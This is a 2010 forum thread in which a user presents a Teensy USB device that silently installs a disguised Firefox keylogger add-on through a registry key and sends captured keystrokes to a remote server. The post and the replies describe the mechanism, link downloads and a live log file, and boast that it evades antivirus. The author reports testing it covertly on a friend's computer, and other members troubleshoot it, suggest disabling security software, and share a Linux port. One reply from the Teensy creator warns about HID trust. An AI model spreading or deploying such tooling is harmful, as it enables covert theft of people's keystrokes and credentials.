sandred Posted May 16, 2010 Share Posted May 16, 2010 By using the combination of Cerolobo's code (though I am not Base64 encrypting it) to upload files and Vile's style of calling the command prompt, I made a proof of concept keylogger plugin installation for firefox. When teensy is inserted into usb, it uploads the plugin files into C:\kl folder (please delete the folder if it already exists) and then proceeds to install the plugin into firefox by adding registry key into HKCU\Software\Mozilla\Firefox\Extensions. If firefox is already running then it is killed and restarted immediately to install the plugin. If not, then the plugin(displayed as "Firefox Security Addon") loads when firefox starts the next time. If everything goes fine, it will be done in 10 secs. The keystrokes are then sent to remote server (specified in the code). The remote server then captures the keystrokes, time stamps and ip stamps (Bonus! we get the ip too) the data and logs it. Please keep in mind that this is by no means a polished or optimized code, bugs will exist. So watch out. I quickly copy pasted everything together and tested it. It works beautifully on XP x64 and Win 7 x64. I don't see why this can not be implemented in a more sophisticated way for other plugin supported browsers and for all OS's. I would love to see somebody optimize it. Download the code from here http://karmetasploit.com/KL/AllFiles.zip if you do not bother to change the server or just want to test it, then the logs are currently stored in this location: http://karmetasploit.com/KL/logger.txt Some plus points with these kind of keyloggers: It works behind what ever firewalls as long as Firefox gets the internet. 100% AV undetectable You can decide to log or not to log based on ip. Why bother stealing cookies when you can get all the key strokes. :) Quote Link to comment Share on other sites More sharing options...
Elementix Posted May 16, 2010 Share Posted May 16, 2010 (edited) Can you go into a little more detail on how exactly this works? Does the FF plugin go onto a seperate thumbdrive or does it download the plugin then install it? The rest of it seems pretty straightforward.. Edited May 16, 2010 by Elementix Quote Link to comment Share on other sites More sharing options...
Paul Stoffregen Posted May 17, 2010 Share Posted May 17, 2010 (edited) You could try looking at the code! It's only 219 lines (plus a 7 line PHP script). Much of it is just strings which encode the "payload", which is only 41 lines (about 1400 bytes), mostly a tiny javascript fragment and some XML. He put the plugin files in a subdirectory, so you can look at them naturally instead of inside strings. The plugin is only 3 tiny files totaling 41 lines. The actual javascript code is only 11 lines! There's no large, complex binary. It's all just simple, tiny text files you can look at using any lame program, even Notepad. Can you go into a little more detail on how exactly this works? If you'd read the code, it's pretty easy to see those 11 javascript lines just add an "onkey" event listener, which packs every 20 keystrokes into the query string on a HTTP get request to a particular URL. The 7 lines of PHP receives it and puts it into a file. There's some XML which presumably the browser's plugin install process wants. The actual code basically just types these tiny files in, then adds a registry key. Maybe I missed a detail or two, but that's the jist of it. If there were ever a scary example of why modern operating systems are going to have to rethink their trust model for HID, this is certainly it. Scary, but pretty amazing, in a creepy kinda of way. If anyone at Microsoft, Apple or any Linux kernel developer doesn't believe blindly trusting all HID devices is a real issue, all they need to do is take one look at this! To be honest, I had absolutely no idea a keystroke logging plugin would be so tiny and so simple. I also never imagined people would make these kinds of things when I created Teensy. Please please please be responsible with this stuff. Edited May 17, 2010 by Paul Stoffregen Quote Link to comment Share on other sites More sharing options...
Elementix Posted May 17, 2010 Share Posted May 17, 2010 You could try looking at the code! It's only 219 lines (plus a 7 line PHP script). Much of it is just strings which encode the "payload", which is only 41 lines (about 1400 bytes), mostly a tiny javascript fragment and some XML. He put the plugin files in a subdirectory, so you can look at them naturally instead of inside strings. The plugin is only 3 tiny files totaling 41 lines. The actual javascript code is only 11 lines! There's no large, complex binary. It's all just simple, tiny text files you can look at using any lame program, even Notepad. If you'd read the code, it's pretty easy to see those 11 javascript lines just add an "onkey" event listener, which packs every 20 keystrokes into the query string on a HTTP get request to a particular URL. The 7 lines of PHP receives it and puts it into a file. There's some XML which presumably the browser's plugin install process wants. The actual code basically just types these tiny files in, then adds a registry key. Maybe I missed a detail or two, but that's the jist of it. If there were ever a scary example of why modern operating systems are going to have to rethink their trust model for HID, this is certainly it. Scary, but pretty amazing, in a creepy kinda of way. If anyone at Microsoft, Apple or any Linux kernel developer doesn't believe blindly trusting all HID devices is a real issue, all they need to do is take one look at this! To be honest, I had absolutely no idea a keystroke logging plugin would be so tiny and so simple. I also never imagined people would make these kinds of things when I created Teensy. Please please please be responsible with this stuff. Well thanks for assuming that I asked a question without looking things over. I DID look at the code, but just because I'm here doesn't mean I know all the in's and out's of how everything works, so chill out with that crap. With that being said, are all these files just flashed onto the teensy (besides the php script)? I'm just a bit confused... Quote Link to comment Share on other sites More sharing options...
Sl45h3R Posted May 17, 2010 Share Posted May 17, 2010 By the sound of what he said, I think they are stored in the actual source itself, and then "echo"'d into a file on the computer. Quote Link to comment Share on other sites More sharing options...
sandred Posted May 17, 2010 Author Share Posted May 17, 2010 All the code does it is create a "C:\kl" folder and "print" three files to it. Once it prints the files, it just adds a registry entry into HKCU (which does not need admin rights) to say to firefox "Hey there is a plugin that you need to load at C:\kl" and when firefox starts it loads the code . Once loaded, the plugin watches all the keystrokes made into browser and quietly posts them to the remote server. The php script is placed in the server, which then takes these keys sent and stores them to a file. You do not need to load these files into teensy. All you need to do is compile the code in Arduino and flash the teensy with it. When you plug in the teensy, it just echos the code to the files and does the rest of that stuff. You can just try it as it is with out changing anything. you can always uninstall it after testing. Yes the keylogger is very simple and very effective and completely undetectable as it is effectively just 2 lines of java script running inside a browser. I already field tested it on one of my friends computer and he does not think any thing ever happened at all when teensy installed it. I had to explain him the details and even after that he does not really believe thats possible. Well educate the masses I guess. Quote Link to comment Share on other sites More sharing options...
Elementix Posted May 17, 2010 Share Posted May 17, 2010 Ok, so I understand how things work now and I got things running for the most part...but for some reason it isn't working. It doesn't look like it adds anything new into the mozilla portion of the registry and I don't see any new plugins/addons in firefox. I've tried on 3 different PCs and I'm kinda stuck right now.....any thoughts? Quote Link to comment Share on other sites More sharing options...
Sl45h3R Posted May 17, 2010 Share Posted May 17, 2010 Have a look in the registry to see if it adds the entry. I know Defense+ (comodo) blocks unauthorized access to the registry, try disable all your antivirus/firewall solutions and try it. Quote Link to comment Share on other sites More sharing options...
sandred Posted May 17, 2010 Author Share Posted May 17, 2010 Ok, so I understand how things work now and I got things running for the most part...but for some reason it isn't working. It doesn't look like it adds anything new into the mozilla portion of the registry and I don't see any new plugins/addons in firefox. I've tried on 3 different PCs and I'm kinda stuck right now.....any thoughts? If you have a folder C:\kl (may be from previous runs), then you have to delete it before running it again. Try that and try to plug it in with nothing else running on your computer, may be your computer is slow at multitasking and missing some keystrokes. Quote Link to comment Share on other sites More sharing options...
Elementix Posted May 17, 2010 Share Posted May 17, 2010 Well, that's not the problem...I'm on a quad-core machine with 3 gigs of ram. I've tried it on my pc, which is running a 32-bit copy of Windows 7 and I also tried it in 2 seperate virtual machines running a fresh install of XP with firefox installed. It does seems like it's working, but everything is going so fast I can't even see if there are any errors being displayed... All I did was change the website path in your code to the path to my logger.txt file and my hosted .php file. That's all I should have to mess with right? Quote Link to comment Share on other sites More sharing options...
Elementix Posted May 17, 2010 Share Posted May 17, 2010 (edited) Well, apparently it just decided that it wanted to start working....Thanks anyway guys. :) Edit: Ok, so it worked on a new virtual machine with XP but it doesn't seem to want to work with my clean install of Windows 7 on my actual machine.. *sigh*...guess I'll keep playing with it... Edited May 17, 2010 by Elementix Quote Link to comment Share on other sites More sharing options...
Bobbers Posted May 19, 2010 Share Posted May 19, 2010 sweet I cant w8 to look at it! skool blocked the keyword .zip Quote Link to comment Share on other sites More sharing options...
Elementix Posted May 19, 2010 Share Posted May 19, 2010 It works great when it does work. I'm not sure what's different about the 2 different computers I tried it on. Both of them were fresh installs of Windows 7 from the same disc. Only firefox installed and nothing else. One's a desktop, and one's a laptop, but only the laptop seemed to install it. Just don't know what could be different.. Quote Link to comment Share on other sites More sharing options...
DJ Felix Posted June 14, 2010 Share Posted June 14, 2010 Looks like the site is down. Anyone have a mirror URL? Quote Link to comment Share on other sites More sharing options...
fitzdaddy Posted June 15, 2010 Share Posted June 15, 2010 Does anyone have the source code for this? The link is no longer working. Quote Link to comment Share on other sites More sharing options...
sandred Posted June 15, 2010 Author Share Posted June 15, 2010 Does anyone have the source code for this? The link is no longer working. I have put them back. Let me know if you have a problem. Quote Link to comment Share on other sites More sharing options...
fitzdaddy Posted June 17, 2010 Share Posted June 17, 2010 I have put them back. Let me know if you have a problem. Sandyreddy, Thanks for putting this back up. I had a little trouble compiling it in Arduino due to it not finding the header file. After renaming the header file the whole thing worked like a charm. Specs: - 32 bit XP as a VM - Firefox version 3.5.7. Fitzdaddy Quote Link to comment Share on other sites More sharing options...
fitzdaddy Posted June 21, 2010 Share Posted June 21, 2010 Fellow Teensy Fans, Here is my wack at the keylogger for Firefox. I have done a little house cleaning on the source code (neat freak) and added support for Linux. Currently I use the command <pre>gnome-terminal</pre> to get a shell so it will only work in Gnome Linux distributions. For some reason the Arduino IDE did not like the name keylogger anymore so I had to rename it. Future improvements could be to suppress notification of additional extensions and cleaning up the presentation of the windows command prompt. I hope it is clear from the source code that much credit goes to Sandyreddy and those that he got inspiration from. http://dl.dropbox.com/u/1588928/fflogger.tar.gz Fitzdaddy Quote Link to comment Share on other sites More sharing options...
Carol Posted August 5, 2011 Share Posted August 5, 2011 So smart to have a deep study on keylogger things, Sandred. I think it is very difficult and complicated......so even when i needed one to use on my laptop, i just bought one online with knowing nothing about it. But luck is that it works not bad. Quote Link to comment Share on other sites More sharing options...
Carol Posted August 8, 2011 Share Posted August 8, 2011 Oh, sorry, forget to say that what keylogging program i am using is the Amac keylogger for mac last time..... Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.